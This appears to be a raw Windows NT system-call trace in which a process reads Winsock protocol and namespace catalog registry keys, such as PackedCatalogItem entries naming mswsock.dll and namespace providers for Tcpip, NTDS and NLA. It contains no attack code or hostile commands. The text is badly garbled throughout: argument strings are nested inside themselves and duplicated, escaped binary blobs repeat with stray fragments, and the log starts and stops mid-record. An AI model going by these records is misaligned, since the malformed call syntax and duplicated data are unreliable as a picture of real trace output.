\0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\02\01\0B\08\0E\09\0D\05\0-\03\0F\0C\03\0-\04\0F\09\0D\0-\08\0\0\0\0\0\204\3\0\0U\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0U\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0V\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\02\02\0V\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0W\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0W\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0X\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0W\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0X\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0 (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222!\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\371\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\02\01\0B\08\0E\09\0D\05\0-\03\0F\0C\03\0-\04\0F\09\0D\0-\08\0\0\0\0\0\204\3\0\0U\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0U\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0V\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\02\02\0V\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0W\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0W\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0X\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0 02645 896 NtClose (220, ... ) == 0x0 02646 896 NtOpenKey (0x20019, {24, 216, 0x40, 0, 0, (0x20019, {24, 216, 0x40, 0, 0, "000000000022"}, ... 220, ) }, ... 220, ) == 0x0 02647 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02648 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02649 896 NtAllocateVirtualMemory (-1, 1384448, 0, 4096, 4096, 4, ... 1384448, 4096, ) == 0x0 02650 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222"\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\371\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\02\01\0B\08\0E\09\0D\05\0-\03\0F\0C\03\0-\04\0F\09\0D\0-\08\0\0\0\0\0\204\3\0\0[\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0[\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\330\0\0\0\\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0]\12\0\0\344\4\0\0\200\3\0\0\305\0\0\0\0\0\1\0\0\0\0\0\24\0\0\0\320\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0]\12\0\0\344\4\0\0\200\3\0\0\305\0\0\0\1\0\1\0\2\1\0\0\0\0\0\0^\12\0\0\344\4\0\0\200\3\0\0\25\0\0\0\0\0\1\0\0\0\0\0\24\0\0\0\3\0\37\0\377\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0^\12\0\0\344\4\0\0\200\3\0\0\25\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\330\0\0\0_\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0T\0\0\0\0\0\0\2\0\0\0\0\30\0\0\0\314\0\0\0l\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$\0&\0P\201\24\0\0\0\0\0N\0a\0m\0e\0S\0p\0a\0c\0e\0_\0C\0a\0t\0a\0l\0o\0g\05\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222"\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\371\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\02\01\0B\08\0E\09\0D\05\0-\03\0F\0C\03\0-\04\0F\09\0D\0-\08\0\0\0\0\0\204\3\0\0[\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0[\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\330\0\0\0\\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0]\12\0\0\344\4\0\0\200\3\0\0\305\0\0\0\0\0\1\0\0\0\0\0\24\0\0\0\320\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0]\12\0\0\344\4\0\0\200\3\0\0\305\0\0\0\1\0\1\0\2\1\0\0\0\0\0\0^\12\0\0\344\4\0\0\200\3\0\0\25\0\0\0\0\0\1\0\0\0\0\0\24\0\0\0\3\0\37\0\377\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0^\12\0\0\344\4\0\0\200\3\0\0\25\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\330\0\0\0_\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0T\0\0\0\0\0\0\2\0\0\0\0\30\0\0\0\314\0\0\0l\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$\0&\0P\201\24\0\0\0\0\0N\0a\0m\0e\0S\0p\0a\0c\0e\0_\0C\0a\0t\0a\0l\0o\0g\05\0"}, 900, ) \4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\371\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\02\01\0B\08\0E\09\0D\05\0-\03\0F\0C\03\0-\04\0F\09\0D\0-\08\0\0\0\0\0\204\3\0\0[\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0[\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\330\0\0\0\\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0]\12\0\0\344\4\0\0\200\3\0\0\305\0\0\0\0\0\1\0\0\0\0\0\24\0\0\0\320\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0]\12\0\0\344\4\0\0\200\3\0\0\305\0\0\0\1\0\1\0\2\1\0\0\0\0\0\0^\12\0\0\344\4\0\0\200\3\0\0\25\0\0\0\0\0\1\0\0\0\0\0\24\0\0\0\3\0\37\0\377\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0^\12\0\0\344\4\0\0\200\3\0\0\25\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\330\0\0\0_\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0T\0\0\0\0\0\0\2\0\0\0\0\30\0\0\0\314\0\0\0l\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$\0&\0P\201\24\0\0\0\0\0N\0a\0m\0e\0S\0p\0a\0c\0e\0_\0C\0a\0t\0a\0l\0o\0g\05\0"}, 900, ) == 0x0 02651 896 NtClose (220, ... ) == 0x0 02652 896 NtClose (216, ... ) == 0x0 02653 896 NtWaitForSingleObject (208, 0, {0, 0}, ... ) == 0x102 02654 896 NtCreateEvent (0x1f0003, 0x0, 0, 0, ... 216, ) == 0x0 02655 896 NtOpenKey (0x2000000, {24, 204, 0x40, 0, 0, (0x2000000, {24, 204, 0x40, 0, 0, "NameSpace_Catalog5"}, ... 220, ) }, ... 220, ) == 0x0 02656 896 NtQueryValueKey (220, (220, "Serial_Access_Num", Partial, 144, ... TitleIdx=0, Type=4, Data="\5\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (220, "Serial_Access_Num", Partial, 144, ... TitleIdx=0, Type=4, Data="\5\0\0\0"}, 16, ) }, 16, ) == 0x0 02657 896 NtNotifyChangeKey (220, 216, 0, 0, 2011455960, 1, 0, 0, 0, 1, ... ) == 0x103 02658 896 NtQueryValueKey (220, (220, "Serial_Access_Num", Partial, 144, ... TitleIdx=0, Type=4, Data="\5\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (220, "Serial_Access_Num", Partial, 144, ... TitleIdx=0, Type=4, Data="\5\0\0\0"}, 16, ) }, 16, ) == 0x0 02659 896 NtOpenKey (0x2000000, {24, 220, 0x40, 0, 0, (0x2000000, {24, 220, 0x40, 0, 0, "00000005"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02660 896 NtQueryValueKey (220, (220, "Num_Catalog_Entries", Partial, 144, ... TitleIdx=0, Type=4, Data="\4\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (220, "Num_Catalog_Entries", Partial, 144, ... TitleIdx=0, Type=4, Data="\4\0\0\0"}, 16, ) }, 16, ) == 0x0 02661 896 NtOpenKey (0x2000000, {24, 220, 0x40, 0, 0, (0x2000000, {24, 220, 0x40, 0, 0, "Catalog_Entries"}, ... 224, ) }, ... 224, ) == 0x0 02662 896 NtOpenKey (0x20019, {24, 224, 0x40, 0, 0, (0x20019, {24, 224, 0x40, 0, 0, "000000000001"}, ... 228, ) }, ... 228, ) == 0x0 02663 896 NtQueryValueKey (228, (228, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0m\0s\0w\0s\0o\0c\0k\0.\0d\0l\0l\0\0\0"}, 80, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (228, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0m\0s\0w\0s\0o\0c\0k\0.\0d\0l\0l\0\0\0"}, 80, ) }, 80, ) == 0x0 02664 896 NtQueryValueKey (228, (228, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0m\0s\0w\0s\0o\0c\0k\0.\0d\0l\0l\0\0\0"}, 80, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (228, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0m\0s\0w\0s\0o\0c\0k\0.\0d\0l\0l\0\0\0"}, 80, ) }, 80, ) == 0x0 02665 896 NtQueryValueKey (228, (228, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="T\0c\0p\0i\0p\0\0\0"}, 24, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (228, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="T\0c\0p\0i\0p\0\0\0"}, 24, ) }, 24, ) == 0x0 02666 896 NtQueryValueKey (228, (228, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="T\0c\0p\0i\0p\0\0\0"}, 24, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (228, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="T\0c\0p\0i\0p\0\0\0"}, 24, ) }, 24, ) == 0x0 02667 896 NtQueryValueKey (228, (228, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="T\0c\0p\0i\0p\0\0\0"}, 24, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (228, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="T\0c\0p\0i\0p\0\0\0"}, 24, ) }, 24, ) == 0x0 02668 896 NtQueryValueKey (228, (228, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="T\0c\0p\0i\0p\0\0\0"}, 24, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (228, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="T\0c\0p\0i\0p\0\0\0"}, 24, ) }, 24, ) == 0x0 02669 896 NtQueryValueKey (228, (228, "ProviderId", Partial, 144, ... TitleIdx=0, Type=3, Data="@\235\5"\236~\317\21\256Z\0\252\0\247\21+"}, 28, ) , Partial, 144, ... TitleIdx=0, Type=3, Data= (228, "ProviderId", Partial, 144, ... TitleIdx=0, Type=3, Data="@\235\5"\236~\317\21\256Z\0\252\0\247\21+"}, 28, ) \236~\317\21\256Z\0\252\0\247\21+"}, 28, ) == 0x0 02670 896 NtQueryValueKey (228, (228, "AddressFamily", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02671 896 NtQueryValueKey (228, (228, "SupportedNameSpace", Partial, 144, ... TitleIdx=0, Type=4, Data="\14\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (228, "SupportedNameSpace", Partial, 144, ... TitleIdx=0, Type=4, Data="\14\0\0\0"}, 16, ) }, 16, ) == 0x0 02672 896 NtQueryValueKey (228, (228, "Enabled", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (228, "Enabled", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0 02673 896 NtQueryValueKey (228, (228, "Version", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (228, "Version", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0 02674 896 NtQueryValueKey (228, (228, "StoresServiceClassInfo", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (228, "StoresServiceClassInfo", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0 02675 896 NtClose (228, ... ) == 0x0 02676 896 NtOpenKey (0x20019, {24, 224, 0x40, 0, 0, (0x20019, {24, 224, 0x40, 0, 0, "000000000002"}, ... 228, ) }, ... 228, ) == 0x0 02677 896 NtQueryValueKey (228, (228, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0w\0i\0n\0r\0n\0r\0.\0d\0l\0l\0\0\0"}, 78, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (228, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0w\0i\0n\0r\0n\0r\0.\0d\0l\0l\0\0\0"}, 78, ) }, 78, ) == 0x0 02678 896 NtQueryValueKey (228, (228, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0w\0i\0n\0r\0n\0r\0.\0d\0l\0l\0\0\0"}, 78, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (228, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0w\0i\0n\0r\0n\0r\0.\0d\0l\0l\0\0\0"}, 78, ) }, 78, ) == 0x0 02679 896 NtQueryValueKey (228, (228, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0T\0D\0S\0\0\0"}, 22, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (228, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0T\0D\0S\0\0\0"}, 22, ) }, 22, ) == 0x0 02680 896 NtQueryValueKey (228, (228, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0T\0D\0S\0\0\0"}, 22, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (228, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0T\0D\0S\0\0\0"}, 22, ) }, 22, ) == 0x0 02681 896 NtQueryValueKey (228, (228, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0T\0D\0S\0\0\0"}, 22, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (228, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0T\0D\0S\0\0\0"}, 22, ) }, 22, ) == 0x0 02682 896 NtQueryValueKey (228, (228, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0T\0D\0S\0\0\0"}, 22, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (228, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0T\0D\0S\0\0\0"}, 22, ) }, 22, ) == 0x0 02683 896 NtQueryValueKey (228, (228, "ProviderId", Partial, 144, ... TitleIdx=0, Type=3, Data="\3567&;\200\345\317\21\245U\0\300O\330\324\254"}, 28, ) , Partial, 144, ... TitleIdx=0, Type=3, Data= (228, "ProviderId", Partial, 144, ... TitleIdx=0, Type=3, Data="\3567&;\200\345\317\21\245U\0\300O\330\324\254"}, 28, ) }, 28, ) == 0x0 02684 896 NtQueryValueKey (228, (228, "AddressFamily", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02685 896 NtQueryValueKey (228, (228, "SupportedNameSpace", Partial, 144, ... TitleIdx=0, Type=4, Data=" \0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (228, "SupportedNameSpace", Partial, 144, ... TitleIdx=0, Type=4, Data=" \0\0\0"}, 16, ) }, 16, ) == 0x0 02686 896 NtQueryValueKey (228, (228, "Enabled", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (228, "Enabled", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0 02687 896 NtQueryValueKey (228, (228, "Version", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (228, "Version", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0 02688 896 NtQueryValueKey (228, (228, "StoresServiceClassInfo", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (228, "StoresServiceClassInfo", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0 02689 896 NtClose (228, ... ) == 0x0 02690 896 NtOpenKey (0x20019, {24, 224, 0x40, 0, 0, (0x20019, {24, 224, 0x40, 0, 0, "000000000003"}, ... 228, ) }, ... 228, ) == 0x0 02691 896 NtQueryValueKey (228, (228, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0m\0s\0w\0s\0o\0c\0k\0.\0d\0l\0l\0\0\0"}, 80, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (228, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0m\0s\0w\0s\0o\0c\0k\0.\0d\0l\0l\0\0\0"}, 80, ) }, 80, ) == 0x0 02692 896 NtQueryValueKey (228, (228, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0m\0s\0w\0s\0o\0c\0k\0.\0d\0l\0l\0\0\0"}, 80, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (228, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0m\0s\0w\0s\0o\0c\0k\0.\0d\0l\0l\0\0\0"}, 80, ) }, 80, ) == 0x0 02693 896 NtQueryValueKey (228, (228, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0e\0t\0w\0o\0r\0k\0 \0L\0o\0c\0a\0t\0i\0o\0n\0 \0A\0w\0a\0r\0e\0n\0e\0s\0s\0 \0(\0N\0L\0A\0)\0 \0N\0a\0m\0e\0s\0p\0a\0c\0e\0\0\0"}, 98, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (228, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0e\0t\0w\0o\0r\0k\0 \0L\0o\0c\0a\0t\0i\0o\0n\0 \0A\0w\0a\0r\0e\0n\0e\0s\0s\0 \0(\0N\0L\0A\0)\0 \0N\0a\0m\0e\0s\0p\0a\0c\0e\0\0\0"}, 98, ) }, 98, ) == 0x0 02694 896 NtQueryValueKey (228, (228, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0e\0t\0w\0o\0r\0k\0 \0L\0o\0c\0a\0t\0i\0o\0n\0 \0A\0w\0a\0r\0e\0n\0e\0s\0s\0 \0(\0N\0L\0A\0)\0 \0N\0a\0m\0e\0s\0p\0a\0c\0e\0\0\0"}, 98, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (228, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0e\0t\0w\0o\0r\0k\0 \0L\0o\0c\0a\0t\0i\0o\0n\0 \0A\0w\0a\0r\0e\0n\0e\0s\0s\0 \0(\0N\0L\0A\0)\0 \0N\0a\0m\0e\0s\0p\0a\0c\0e\0\0\0"}, 98, ) }, 98, ) == 0x0 02695 896 NtQueryValueKey (228, (228, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0e\0t\0w\0o\0r\0k\0 \0L\0o\0c\0a\0t\0i\0o\0n\0 \0A\0w\0a\0r\0e\0n\0e\0s\0s\0 \0(\0N\0L\0A\0)\0 \0N\0a\0m\0e\0s\0p\0a\0c\0e\0\0\0"}, 98, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (228, "DisplayString", Partial, 